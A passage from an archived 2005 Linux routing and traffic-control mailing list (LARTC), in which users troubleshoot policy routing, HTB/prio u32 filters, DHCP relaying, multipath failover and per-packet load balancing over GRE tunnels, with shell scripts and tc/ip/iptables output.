|61.11.104.0/24 dev eth0 proto kernel scope link src 61.11.104.63 > |127.0.0.0/8 dev lo scope link > |default via 61.11.104.1 dev eth0 > | > |[root /root]# ip > |Usage: ip [ OPTIONS ] OBJECT { COMMAND | help } > |where OBJECT := { link | addr | route | rule | neigh | tunnel | > | maddr | mroute | monitor } > |OPTIONS := { -V[ersion] | -s[tatistics] | -r[esolve] | > |-f[amily] { inet | inet6 | ipx | dnet | link } > || -o[neline] } > | > |Thanks and Regards, > | > |Pankaj Agarwal > |_______________________________________________ > |LARTC mailing list / LARTC@mailman.ds9a.nl > |http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > | > | > | From snitt@urbnet.hu Sat Feb 5 17:29:43 2005 From: snitt@urbnet.hu (Endre SZABO) Date: Sat, 5 Feb 2005 18:29:43 +0100 (CET) Subject: [LARTC] Help - Getting an error when trying to add prio to tables.... In-Reply-To: <00a101c50ba6$a6fde160$8d00150a@dreammac> References: <003c01c50b97$62f77940$8d00150a@dreammac> <00a101c50ba6$a6fde160$8d00150a@dreammac> Message-ID: ok, to let policy routing work, you will have to have these options checked in menuconfig afaik: Networking options ---> [*] TCP/IP networking [*] IP: multicasting [*] IP: advanced router [*] IP: policy routing 2.4 kernel documentation refers to http://www.compendium.com.ar/policy-routing.txt which contains the following: 2. Required software. You'll need a recent 2.1.x kernel (i've a pair of production machines running 2.1.119 from some weeks ago and my work devel machine runs 2.1.129) compiled with policy routing. (depends on Networking Options/ IP: advanced router) .-- Valaszul Pankaj Agarwal levelere: |tried these but not working... i edited the file /usr/src/linux/.config | |CONFIG_IP_ADVANCED_ROUTER=y |CONFIG_IP_MULTIPLE_TABLES=y |CONFIG_IP_ROUTE_FWMARK=y |CONFIG_IP_ROUTE_NAT=y |CONFIG_IP_ROUTE_MULTIPATH=y |CONFIG_IP_ROUTE_TOS=y |CONFIG_IP_ROUTE_VERBOSE=y |CONFIG_IP_ROUTE_LARGE_TABLES=y | |looking for you help | | |----- Original Message ----- From: "Endre SZABO" |To: "Pankaj Agarwal" |Cc: |Sent: Saturday, February 05, 2005 10:39 PM |Subject: Re: [LARTC] Help - Getting an error when trying to add prio to |tables.... | | |> compile a kernel with the required options checked first, like: |> |> CONFIG_IP_ROUTE_MULTIPATH=y |> CONFIG_IP_MULTIPLE_TABLES=y |> CONFIG_IP_ADVANCED_ROUTER=y |> |> but i'm not sure if these are the required ones. |> |> 73, Snitt From lars@lhanke.de Sun Feb 6 09:19:47 2005 From: lars@lhanke.de (Dr. Lars Hanke) Date: Sun, 6 Feb 2005 10:19:47 +0100 Subject: [LARTC] dhcrelay on router Message-ID: <200502061019.47802.lars@lhanke.de> Hi, I'm setting up a router (linux, debian-sarge), which shall relay dhcp requests from all subnets to a central DHCP server. The general stuff is solved, i.e. I can ping from any connected machine to any other including the NICs of the router itself. All firewall tables (including nat and mangle) are set to ACCEPT and flushed. On my model system I have the NIC 172.16.1.121 (eth1), which is surtur and also connects to adept the DHCP (172.16.1.7). This net (172.16.1.0) shall be connected to 172.16.2.0 using the other NIC 172.16.2.1 (eth0, not in DNS). Attached to it is my WLAN access point (ymir, 172.16.2.12). And this is what happens: #> dhcrelay -i eth0 adept.mgr #> tcpdump -i any port bootpc or port bootps 09:42:09.996479 172.16.1.12.bootpc > 255.255.255.255.bootps: xid:0x960f0000 flags:0x8000 [|bootp] 09:42:09.997009 surtur.mgr.bootps > adept.mgr.bootps: (request) xid:0x960f0000 flags:0x8000 G:172.16.2.1 ether 0:9:5b:68:19:fb [|bootp] (DF) 09:42:09.997603 adept.mgr.bootps > 172.16.2.1.bootps: (reply) xid:0x960f0000 flags:0x8000 Y:ymir.mgr S:adept.mgr G:172.16.2.1 ether 0:9:5b:68:19:fb [| bootp] (DF) ... but somethink like the following never appears (line taken from DHCP exchange from server installed on router): 09:59:38.780364 172.16.2.1.bootps > 255.255.255.255.bootpc: xid:0x960f0000 flags:0x8000 Y:ymir.mgr S:172.16.2.1 [|bootp] [tos 0x10] Therefore, ymir never gets his IP! Any help appreciated, - lars. From J.Kraaijeveld@Askesis.nl Sun Feb 6 11:01:00 2005 From: J.Kraaijeveld@Askesis.nl (Joost Kraaijeveld) Date: Sun, 6 Feb 2005 12:01:00 +0100 Subject: [LARTC] Bridging lan over wireless link Message-ID: Hi all, I want to create a bridge (see picture below) between 2 LANs with the = same IP range (192.168.0.0/24) using 2 wireless links that use load = sharing over multiple interfaces (as descibed here: = http://lartc.org/howto/lartc.loadshare.html) for load balancing and = fault tolerance. Both links should use IPsec for encryption. I have googled for an example that does this but I could not find it. Is this possible? Not in threory but in practise: has anyone done this? = If so, can anyone give me an example/pointer to an example of how to do = this? ________ ________ | | | | | ant1.1 |---| ant2.1 | |________| |________| _________ | | _________ | |-eth1-+ +--eth1-| | lan1 --eth0-| bridge1 | | bridge2 |-eth0--lan2 |_________|-eth2-+ +--eth2-|_________| ____|___ ____|___ | | | | | ant1.2 |---| ant2.2 | |________| |________| Groeten, Joost Kraaijeveld Askesis B.V. Molukkenstraat 14 6524NB Nijmegen tel: 024-3888063 / 06-51855277 fax: 024-3608416 e-mail: J.Kraaijeveld@Askesis.nl web: www.askesis.nl=20 From pablo@pablodanielrey.com.ar Sun Feb 6 12:13:30 2005 From: pablo@pablodanielrey.com.ar (pablo@pablodanielrey.com.ar) Date: Sun, 6 Feb 2005 12:13:30 +0000 Subject: [LARTC] problems with u32 fiter Message-ID: <200502061213.30560.listas@pablodanielrey.com.ar> hello to all i'm trying to set a filter but doesn't want to work. i've set ut the qdiscs and the classes like this : tc qdisc add dev ppp0 root handle 1: htb default 20 tc class add dev ppp0 parent 1: classid 1:1 htb rate 120kbit tc class add dev ppp0 parent 1:1 classid 1:20 htb rate 30kbit ceil 120kbit tc class add dev ppp0 parent 1:1 classid 1:21 htb rate 30kbit ceil 120kbit tc class add dev ppp0 parent 1:1 classid 1:22 htb rate 30kbit ceil 120kbit tc class add dev ppp0 parent 1:1 classid 1:23 htb rate 30kbit ceil 120kbit tc qdisc add dev ppp0 parent 1:20 handle 20: prio tc qdisc add dev ppp0 parent 1:21 handle 21: prio tc qdisc add dev ppp0 parent 1:22 handle 22: prio tc qdisc add dev ppp0 parent 1:23 handle 23: prio but when i try to set up the filters : tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.2 flowi= d 1:23 tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowi= d 1:22 tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.1 flowi= d 1:21 says : RTNETLINK answers: Invalid argument =2D-------------------------------------------------------------------- my system : router:~# tc qdisc show dev ppp0 qdisc prio 23: bands 3 priomap =A01 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc prio 22: bands 3 priomap =A01 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc prio 21: bands 3 priomap =A01 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc prio 20: bands 3 priomap =A01 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc htb 1: r2q 10 default 20 direct_packets_stat 0 router:~# tc class show dev ppp0 class prio 23:1 parent 23: [UNKNOWN] class prio 23:2 parent 23: [UNKNOWN] class prio 23:3 parent 23: [UNKNOWN] class prio 22:1 parent 22: [UNKNOWN] class prio 22:2 parent 22: [UNKNOWN] class prio 22:3 parent 22: [UNKNOWN] class prio 21:1 parent 21: [UNKNOWN] class prio 21:2 parent 21: [UNKNOWN] class prio 21:3 parent 21: [UNKNOWN] class prio 20:1 parent 20: [UNKNOWN] class prio 20:2 parent 20: [UNKNOWN] class prio 20:3 parent 20: [UNKNOWN] class htb 1:22 parent 1:1 leaf 22: prio 0 rate 30Kbit ceil 120Kbit burst 16= 37b cburst 1752b class htb 1:1 root rate 120Kbit ceil 120Kbit burst 1752b cburst 1752b class htb 1:23 parent 1:1 leaf 23: prio 0 rate 30Kbit ceil 120Kbit burst 16= 37b cburst 1752b class htb 1:20 parent 1:1 leaf 20: prio 0 rate 30Kbit ceil 120Kbit burst 16= 37b cburst 1752b class htb 1:21 parent 1:1 leaf 21: prio 0 rate 30Kbit ceil 120Kbit burst 16= 37b cburst 1752b router:~# i'm stuck. anybody knows what's going on. thank's=20 From pankaj@toughguy.net Sun Feb 6 15:47:34 2005 From: pankaj@toughguy.net (Pankaj Agarwal) Date: Sun, 6 Feb 2005 21:17:34 +0530 Subject: [LARTC] Urgent Help needed Message-ID: <001c01c50c64$56990920$8d00150a@dreammac> Hi, There's some very silly mistake i've done in my configuration. I did by reading material on web. I'm enclosing my configuration script below. The problem is its not routing the trafic from other interface in case the first interface is down....which should be the wright case. Kindly please guide me what i can do to make it work..dynamically.. Thanks, Pankaj Agarwal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~The Script~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/bin/sh #script written by Pankaj Agarwal #defining location of ip binary IP=/sbin/ip #flushing all the IP/Routing cache echo "removing old rules" $IP rule del prio 50 table main $IP rule del prio 201 from 61.11.104.0/24 table 201 $IP rule del prio 202 from 220.227.153.48/28 table 202 $IP rule del prio 222 table 222 echo "flushing tables" $IP route flush table 201 $IP route flush table 202 $IP route flush table 222 echo "removing tables" $IP route del table 201 $IP route del table 202 $IP route del table 222 #setting loop interface $IP link set lo up $IP addr flush dev lo $IP addr add 127.0.0.1/8 brd + dev lo #setting up the private device $IP link set eth1 up $IP addr flush dev eth1 $IP addr add 192.168.2.5/24 brd + dev eth1 $IP rule add prio 50 table main $IP route del default table main #setting up the public devices $IP link set eth0 up $IP addr flush dev eth0 $IP addr add 61.11.104.63/24 brd 61.11.104.255 dev eth0 $IP link set eth2 up $IP addr flush dev eth2 $IP addr add 220.227.153.61/28 brd 220.227.153.63 dev eth2 #configuring route $IP rule add prio 222 table 222 $IP route add default table 222 proto static nexthop via 61.11.104.1 dev eth0 weight 1 nexthop via 220.227.153.51 dev eth2 weight 3 #configuring for static routes for one connection $IP rule add prio 201 from 61.11.104.0/24 table 201 $IP route add default via 61.11.104.1 dev eth0 src 61.11.104.63 proto static table 201 $IP route append prohibit default table 201 metric 1 proto static $IP rule add prio 202 from 220.227.153.48/28 table 202 $IP route add default via 220.227.153.51 dev eth2 src 220.227.153.61 proto static table 202 $IP route append prohibit default table 202 metric 1 proto static $IP route flush cache while : ; do /bin/ping -c 1 220.227.153.51 >> /dev/null /bin/ping -c 1 61.11.104.1 >>/dev/nyll sleep 60 done From George Alexandru Dragoi Sun Feb 6 17:55:33 2005 From: George Alexandru Dragoi (George Alexandru Dragoi) Date: Sun, 6 Feb 2005 19:55:33 +0200 Subject: [LARTC] problems with u32 fiter In-Reply-To: <200502061213.30560.listas@pablodanielrey.com.ar> References: <200502061213.30560.listas@pablodanielrey.com.ar> Message-ID: <3063e505020609554a08cc5d@mail.gmail.com> I had something similar too, lok here http://mailman.ds9a.nl/pipermail/lartc/2004q4/014444.html On Sun, 6 Feb 2005 12:13:30 +0000, listas@pablodanielrey.com.ar wrote: > hello to all > i'm trying to set a filter but doesn't want to work. > i've set ut the qdiscs and the classes like this : > > tc qdisc add dev ppp0 root handle 1: htb default 20 > tc class add dev ppp0 parent 1: classid 1:1 htb rate 120kbit > tc class add dev ppp0 parent 1:1 classid 1:20 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:21 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:22 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:23 htb rate 30kbit ceil 120kbit > tc qdisc add dev ppp0 parent 1:20 handle 20: prio > tc qdisc add dev ppp0 parent 1:21 handle 21: prio > tc qdisc add dev ppp0 parent 1:22 handle 22: prio > tc qdisc add dev ppp0 parent 1:23 handle 23: prio > > but when i try to set up the filters : > > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.2 flowid 1:23 > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22 > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.1 flowid 1:21 > > says : > > RTNETLINK answers: Invalid argument > > --------------------------------------------------------------------- > > my system : > > router:~# tc qdisc show dev ppp0 > qdisc prio 23: bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 > qdisc prio 22: bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 > qdisc prio 21: bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 > qdisc prio 20: bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 > qdisc htb 1: r2q 10 default 20 direct_packets_stat 0 > > router:~# tc class show dev ppp0 > class prio 23:1 parent 23: [UNKNOWN] > class prio 23:2 parent 23: [UNKNOWN] > class prio 23:3 parent 23: [UNKNOWN] > class prio 22:1 parent 22: [UNKNOWN] > class prio 22:2 parent 22: [UNKNOWN] > class prio 22:3 parent 22: [UNKNOWN] > class prio 21:1 parent 21: [UNKNOWN] > class prio 21:2 parent 21: [UNKNOWN] > class prio 21:3 parent 21: [UNKNOWN] > class prio 20:1 parent 20: [UNKNOWN] > class prio 20:2 parent 20: [UNKNOWN] > class prio 20:3 parent 20: [UNKNOWN] > class htb 1:22 parent 1:1 leaf 22: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b > class htb 1:1 root rate 120Kbit ceil 120Kbit burst 1752b cburst 1752b > class htb 1:23 parent 1:1 leaf 23: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b > class htb 1:20 parent 1:1 leaf 20: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b > class htb 1:21 parent 1:1 leaf 21: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b > router:~# > > i'm stuck. anybody knows what's going on. > thank's > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > -- Bla bla From Brouzouf brouz Sun Feb 6 19:52:13 2005 From: Brouzouf brouz (Brouzouf brouz) Date: Sun, 6 Feb 2005 10:52:13 -0900 Subject: [LARTC] TC GUI or graphs? Message-ID: <1b48ecdd05020611523253e121@mail.gmail.com> Deepak, i think you can look to this option too : http://sourceforge.net/projects/rcc/ The project is in developpment....but within 1 or 2 weeks i think it will be a good project....especially who linux network's owner. rgds, Erwan le Doeuff From fwang@ust.hk Mon Feb 7 14:21:45 2005 From: fwang@ust.hk (Feng WANG) Date: Mon, 7 Feb 2005 22:21:45 +0800 (HKT) Subject: [LARTC] Where to assign weights to different flows? Message-ID: <3897.143.89.126.91.1107786105.squirrel@sqmail.ust.hk> Dear all, I'm really a newbie in using 'tc's class and qdisc concepts. I have a question, for example, when I want to use SFQ, how to assign different weights to different flows? I mean, is there a parameter to be set **in SFQ** to allow some flows to get more bandwidth than others? -- Best Regards, Franklin From listas@pablodanielrey.com.ar Mon Feb 7 11:46:50 2005 From: listas@pablodanielrey.com.ar (pablo daniel rey) Date: Mon, 7 Feb 2005 11:46:50 +0000 Subject: [LARTC] Where to assign weights to different flows? In-Reply-To: <3897.143.89.126.91.1107786105.squirrel@sqmail.ust.hk> References: <3897.143.89.126.91.1107786105.squirrel@sqmail.ust.hk> Message-ID: <200502071146.50616.listas@pablodanielrey.com.ar> i think that what you are looking for is htb or prio From pankaj@toughguy.net Mon Feb 7 14:50:20 2005 From: pankaj@toughguy.net (Pankaj Agarwal) Date: Mon, 7 Feb 2005 20:20:20 +0530 Subject: [LARTC] please guide me ...with regard to multipath dynamic routing in case of link failure Message-ID: <003201c50d24$5e650670$8d00150a@dreammac> Hi, There's some very silly mistake i've done in my configuration. I did by reading material on web. I'm enclosing my configuration script below. The problem is its not routing the trafic from other interface in case the first interface is down....which should be the wright case. Kindly please guide me what i can do to make it work..dynamically.. Also there is a very common situation which many of you might have face...the interface which is gateway for my device is my local router interface...and there's almost no chance of that's being down ever...How can one configure ip route to consider the ISP ends IP as the gateway when deciding on link status... Thanks, Pankaj Agarwal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~The Script~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/bin/sh #script written by Pankaj Agarwal #defining location of ip binary IP=/sbin/ip #flushing all the IP/Routing cache echo "removing old rules" $IP rule del prio 50 table main $IP rule del prio 201 from 61.11.104.0/24 table 201 $IP rule del prio 202 from 220.227.153.48/28 table 202 $IP rule del prio 222 table 222 echo "flushing tables" $IP route flush table 201 $IP route flush table 202 $IP route flush table 222 echo "removing tables" $IP route del table 201 $IP route del table 202 $IP route del table 222 #setting loop interface $IP link set lo up $IP addr flush dev lo $IP addr add 127.0.0.1/8 brd + dev lo #setting up the private device $IP link set eth1 up $IP addr flush dev eth1 $IP addr add 192.168.2.5/24 brd + dev eth1 $IP rule add prio 50 table main $IP route del default table main #setting up the public devices $IP link set eth0 up $IP addr flush dev eth0 $IP addr add 61.11.104.63/24 brd 61.11.104.255 dev eth0 $IP link set eth2 up $IP addr flush dev eth2 $IP addr add 220.227.153.61/28 brd 220.227.153.63 dev eth2 #configuring route $IP rule add prio 222 table 222 $IP route add default table 222 proto static nexthop via 61.11.104.1 dev eth0 weight 1 nexthop via 220.227.153.51 dev eth2 weight 3 #configuring for static routes for one connection $IP rule add prio 201 from 61.11.104.0/24 table 201 $IP route add default via 61.11.104.1 dev eth0 src 61.11.104.63 proto static table 201 $IP route append prohibit default table 201 metric 1 proto static $IP rule add prio 202 from 220.227.153.48/28 table 202 $IP route add default via 220.227.153.51 dev eth2 src 220.227.153.61 proto static table 202 $IP route append prohibit default table 202 metric 1 proto static $IP route flush cache while : ; do /bin/ping -c 1 220.227.153.51 >> /dev/null /bin/ping -c 1 61.11.104.1 >>/dev/nyll sleep 60 done From fwang@ust.hk Mon Feb 7 15:40:50 2005 From: fwang@ust.hk (Feng Wang) Date: Mon, 7 Feb 2005 23:40:50 +0800 Subject: [LARTC] Where to assign weights to different flows? In-Reply-To: <200502071146.50616.listas@pablodanielrey.com.ar> Message-ID: <200502071540.j17FejxQ073624@mx3.ust.hk> But it seems that using htb, we are actually seperating different classes the flows into different rates. And The flows are independent with each other, right? For example: by seperating HTTP and FTP flows into two classes, we can assign different rates for them. But how about treating every HTTP flow differently, i.e. by assigning them different weights. BTW: Who knows how the weights are implemented in WFQ scheduling? How the weights are settled via 'tc' command? Thanks, Franklin -----Original Message----- From: lartc-admin@mailman.ds9a.nl [mailto:lartc-admin@mailman.ds9a.nl] On Behalf Of pablo daniel rey Sent: Monday, February 07, 2005 7:47 PM To: LARTC@mailman.ds9a.nl Subject: Re: [LARTC] Where to assign weights to different flows? i think that what you are looking for is htb or prio _______________________________________________ LARTC mailing list / LARTC@mailman.ds9a.nl http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ From listas@pablodanielrey.com.ar Mon Feb 7 15:37:14 2005 From: listas@pablodanielrey.com.ar (pablo daniel rey) Date: Mon, 7 Feb 2005 15:37:14 +0000 Subject: [LARTC] Where to assign weights to different flows? In-Reply-To: <200502071540.j17FejxQ073624@mx3.ust.hk> References: <200502071540.j17FejxQ073624@mx3.ust.hk> Message-ID: <200502071537.14434.listas@pablodanielrey.com.ar> if you want to distinguish http flows form each other you must filter them by some criteria. the sfq treats flows equally. it doesn't have any weights assigned to the flows. you can achieve what you want by setting up some filters and assigning them to the bands of the prio qdisc something like this : tc qdisc add dev ppp0 handle 1:0 root prio tc filter add dev ppp0 parent 1:0 protocol ip prio 1 u32 match ip dport 80 flowid 1:1 -- band 0 (high priority) http tc filter add dev ppp0 parent 1:0 protocol ip prio 1 u32 match ip dport 21 flowid 1:2 -- band 1 (medium priority) ftp you can even filter the traffic by ip tc filter add dev ppp0 parent 1:0 protocol ip prio 1 u32 match ip src 192.168.0.1 flowid 1:1 -- band 0 hope that helps From shemminger@osdl.org Mon Feb 7 19:00:42 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Mon, 7 Feb 2005 11:00:42 -0800 Subject: [LARTC] [ANNOUNCE] iproute2 - 2.6.10-050207 Message-ID: <20050207110042.166752a3@dxpl.pdx.osdl.net> Update to iproute2 utilities, mostly bug fixes. Only new functionality is integration of the ability to derive netem distribution table from experimental data; simple port from NISTnet. Download from http://developer.osdl.org/dev/iproute2/download/iproute2-050207.tar.gz [Mads Martin Joergensen] Don't mix address families when flushing [Jean-Marc Ranger] Need to call getline() with null for first usage Don't overwrite const arg [Stephen Hemminger] Add experimental distribution Validate classid is not too large to cause loss of bits. -- Stephen Hemminger From andy.furniss@dsl.pipex.com Tue Feb 8 00:35:48 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 00:35:48 +0000 Subject: [LARTC] multiple defaults In-Reply-To: <20050201154256.100e586c.mailinglists@lucassen.org> References: <20050201154256.100e586c.mailinglists@lucassen.org> Message-ID: <42080964.9090407@dsl.pipex.com> richard lucassen wrote: > I have 1 100MB NIC with two 2MB-subnets trough a router behind it. I'd > like to create multiple default classes: > > 1: + > |\_ 1:10 default, ceiling 100000kbit, rate 96000kbit > | > |\_ 1:11 ceiling 2048kbit, rate 2048kbit > | | > | |\_1:110 ceiling 2048kbit, rate 1536kbit > | \_1:111 ceiling 2048kbit, rate 512kbit (default subnet1) > | > \_ 1:12 ceiling 2048kbit, rate 2048kbit > | > |\_1:120 ceiling 2048kbit, rate 1536kbit > \_1:121 ceiling 2048kbit, rate 512kbit (default subnet2) > > I want to use 1:110 for subnet1 sport 3389 > I want to use 1:111 for subnet1 (the rest) > I want to use 1:120 for subnet2 sport 3389 > I want to use 1:121 for subnet2 (the rest) > > When selecting > > u32 match ip dst 10.106.18.0/24 \ > match ip protocol 6 0xff \ > match ip sport 3389 0xffff \ > flowid 1:120 > > u32 match ip dst 10.106.18.0/24 \ > flowid 1:121 > > All traffic goes to 1:121. The first filter for port 3389 is ok and > works. What am I doing wrong? I'd rather do not use fw selectors. Or > should I solve this problem another way? > > Richard. > Does it work if you use the prio parameter on the tc filters with 1 for 1:120 rule and 2 for 1.121? Andy. From andy.furniss@dsl.pipex.com Tue Feb 8 00:58:21 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 00:58:21 +0000 Subject: [LARTC] Packet Level Load Balance inbound/outbound success with nth and route In-Reply-To: References: Message-ID: <42080EAD.9020402@dsl.pipex.com> Joe Nuts wrote: > First of all, I'd like to thank Andy Furniss for his direction and for > helping me get a working example up and running. > > For the following set up to work, you will need a linux computer at > the ISP (server), a linux computer at the client location (client), > and some a public range of IP's you plan to send down to your client. > > (as this configuration involves patching the linux kernel, I assume > you have already downloaded it, and have previously compiled a kernel) > steps to set up the linux computers are ) > make sure both computers have forwarding allowed (i do this with a > 'net.ipv4.ip_forward = 1' line in my /etc/sysctl.conf) > download iptables source, and patch-o-matic files from netfilter.org > unzip those files. run the patch-o-matic script. when you get to the > 'nth' and 'ROUTE' packages, select Y. > then, in the kernel config, under networking options, under netfilter > configuration, under iptables support, select nth, and under packet > mangling, select ROUTE. > compile the kernel, reboot with new kernel. > compile iptables, make && make install. > even after running make install, on my system, the two iptables > libraries didnt make it to /lib/iptables, so i had to copy them > manually. (copy libipt_nth.so and libipt_ROUTE.so from the iptables > source to /lib/iptables) > > now, I use GRE tunnels from the server to the client to send inbound > traffic, I assume you can use any kind of tunnel, just make sure > support for whatever you want to use is installed in to the kernel. > > for the sake of the example, IP's will be defined as follows : > Local IP at client : 66.81.23.1 (eth0) > DSL #1 at client : 64.20.12.46 (eth1) (64.20.12.45 is gateway) > DSL #2 at client : 64.20.12.50 (eth2) (64.20.12.49 is gateway) > > Public IP of server : 66.80.22.30 > Public IP Range sent to client : 66.81.23.0/24 > > the tunnels need to be set up on both the client and the server > --server-- > ip tunnel add client_tun1 mode gre remote 66.20.12.46 local 66.80.22.30 ttl 255 > ip tunnel add client_tun2 mode gre remote 66.20.12.50 local 66.80.22.30 ttl 255 > ip link set client_tun1 up > ip link set client_tun2 up > ip addr add 172.16.0.1/30 dev client_tun1 > ip addr add 172.16.0.5/30 dev client_tun2 > --client-- > ip tunnel add client_tun1 mode gre remote 66.80.22.30 local 66.20.12.46 ttl 255 > ip tunnel add client_tun2 mode gre remote 66.80.22.30 local 66.20.12.50 ttl 255 > ip link set client_tun1 up > ip link set client_tun2 up > ip addr add 172.16.0.2/30 dev client_tun1 > ip addr add 172.16.0.6/30 dev client_tun2 > > traffic outbound from the client doesnt need to go out the tunnel, but > it does need to be split > --client-- > iptables -A POSTROUTING --source 66.81.23.0/24 -t mangle -m nth > --counter 0 --every 2 --packet 0 -j ROUTE --oif eth1 --gw 64.20.12.45 > iptables -A POSTROUTING --source 66.81.23.0/24 -t mangle -m nth > --counter 0 --every 2 --packet 1 -j ROUTE --oif eth2 --gw 64.20.12.49 > > traffic inbound to the client will go to the server, and come to > client through the tunnel > --server-- > iptables -A POSTROUTING --destination 66.81.23.0/24 -t mangle -m nth > --counter 0 --every 2 --packet 0 -j ROUTE --oif client_tun1 --gw > 172.16.0.2 > iptables -A POSTROUTING --destination 66.81.23.0/24 -t mangle -m nth > --counter 0 --every 2 --packet 1 -j ROUTE --oif client_tun2 --gw > 172.16.0.6 > > > Of course this set up can be used to divide across more than two > links, just duplicate / modify the lines as needed. > Computers behind the client can now be given public IP's in that > range, set their gateway to 66.81.23.1, and they're up and running on > both lines. > > I hope this helps someone like me! > Sincerely, > Joe Comeaux Glad you got it working and thanks for posting the solution - all credit to you for that setup - all my suggestions were untested and a bit vague, you did all the work :-) Andy. From lists@wildgooses.com Tue Feb 8 01:09:44 2005 From: lists@wildgooses.com (Ed Wildgoose) Date: Tue, 08 Feb 2005 01:09:44 +0000 Subject: [LARTC] ANNOUNCE: LQL# 0.8.0 and LQL 0.8.0 In-Reply-To: <1107612940.4707.30.camel@ganymede> References: <1107612940.4707.30.camel@ganymede> Message-ID: <42081158.7000107@wildgooses.com> >That's right! Yes, yes, yes. You can now control the QoS features of the >Linux kernel from a high level language. LQL-Sharp provides a Mono (C#) >binding to all of the methods in the LQL library. > > Hmm, this looks very clever! Well done. I hope that this will stimulate some interesting new gui interfaces Good luck Ed W From andy.furniss@dsl.pipex.com Tue Feb 8 01:19:20 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 01:19:20 +0000 Subject: [LARTC] [Fwd: dummy as IMQ replacement] In-Reply-To: <41FDB22F.2060000@cardvn.net> References: <41FDB22F.2060000@cardvn.net> Message-ID: <42081398.4010400@dsl.pipex.com> Nguyen Dinh Nam wrote: > > The discussion about this carried on on netdev - http://marc.theaimsgroup.com/?l=linux-netdev&m=110712327422706&w=2 Andy. From andy.furniss@dsl.pipex.com Tue Feb 8 01:34:00 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 01:34:00 +0000 Subject: [LARTC] PRIO / CBQ / HTB queue drop algorithm In-Reply-To: References: Message-ID: <42081708.9060402@dsl.pipex.com> rsenykoff@harrislogic.com wrote: > Hello all. > > I've been struggling to QoS VoIP at our site and have a successful > implementation at this point. Basically I had to set aside enough > bandwidth for VoIP by placing all other traffic behind an HTB (multiple > classes and queues behind it). Everything is fine. Here's the diagram: > > ------- > | eth | > ------- > | > -------- > | PRIO | > -------- > / \ > 1/ 2\ > --------- \ > | PFIFO | --------------------- > | VoIP | | Hier. Token Bucket | <-- throttled so it + VoIP won't > overrun > --------- ---------------------- the ethernet link (we know how > many > / 2| 3| \ phones we have so this is > possible > 1/ --------- --------- 4\ until you get into conferencing > etc) > --------- | PFIFO | | PFIFO | --------- > | PFIFO | | video | | inst. | | fair | > |citrix | --------- | msgr | | SFQ | > --------- --------- | bulk | > --------- > > I tried using CBQ and HTB as the higher level queues, but it seems that > with lending of traffic out, there is a delay (waiting for space in the > queue) where packets from VoIP will get dropped until there's space. I'm > guessing that the queues all use a basic tail-drop algorithm. > > Have I been doing something wrong? It sure would be cool to be able to > provide immediate bandwidth to VoIP (and other interactive applications) > while still letting those interactive traffic classes lend out bandwidth. > For example, an option on PRIO that lets you specify random drop, and what > bands to drop from. Thus, if a VoIP packet arrives and the queue is full, > rather than dropping the VoIP packet, randomly drop a packet from the bulk > traffic band of the PRIO queue. > > Any thoughts on this are very welcome. > > TIA! > -Ron S. HFSC may be the best solution, but there aren't many examples/much support for it yet. You can lend out unused interactive bandwidth with HTB and keep latency low, the trick is to give interactive class much more bandwidth (rate) than it needs and make bulk classes have low rates. Give interactive prio 0 which is highest priority. Andy. From andy.furniss@dsl.pipex.com Tue Feb 8 01:41:11 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 01:41:11 +0000 Subject: [LARTC] why fwmark don't work In-Reply-To: <004101c50a0a$ca7b5c00$02c0a8c0@sazhost> References: <004101c50a0a$ca7b5c00$02c0a8c0@sazhost> Message-ID: <420818B7.6030907@dsl.pipex.com> saz wrote: > Hi guys im trying to make a port redirecction using iproute together with iptables mangle option .. but for some strange reason is not working yet, I know i can do it in a diferent way, but the idea is using packet marking and redirect the packets with a rule. > > I have two computers PC1 and PC2 > > PC1: 192.168.0.1 this is the one connected to internet, and this machine make the redirection > PC2: 192.168.0.2 this is the smtp server > > So this is what i do in PC1: > > first i mark all the packets incoming for 25 port with "1": > > iptables -t mangle -A PREROUTING -p tcp --dport 25 -j MARK --set-mark 1 > > then i create a table called smtp: > > echo 200 smtp >> /etc/iproute2/rt_tables > > after that i set PC2 as default via for my smtp table: > > ip route add default via 192.168.0.2 table smtp > > and finally i make the 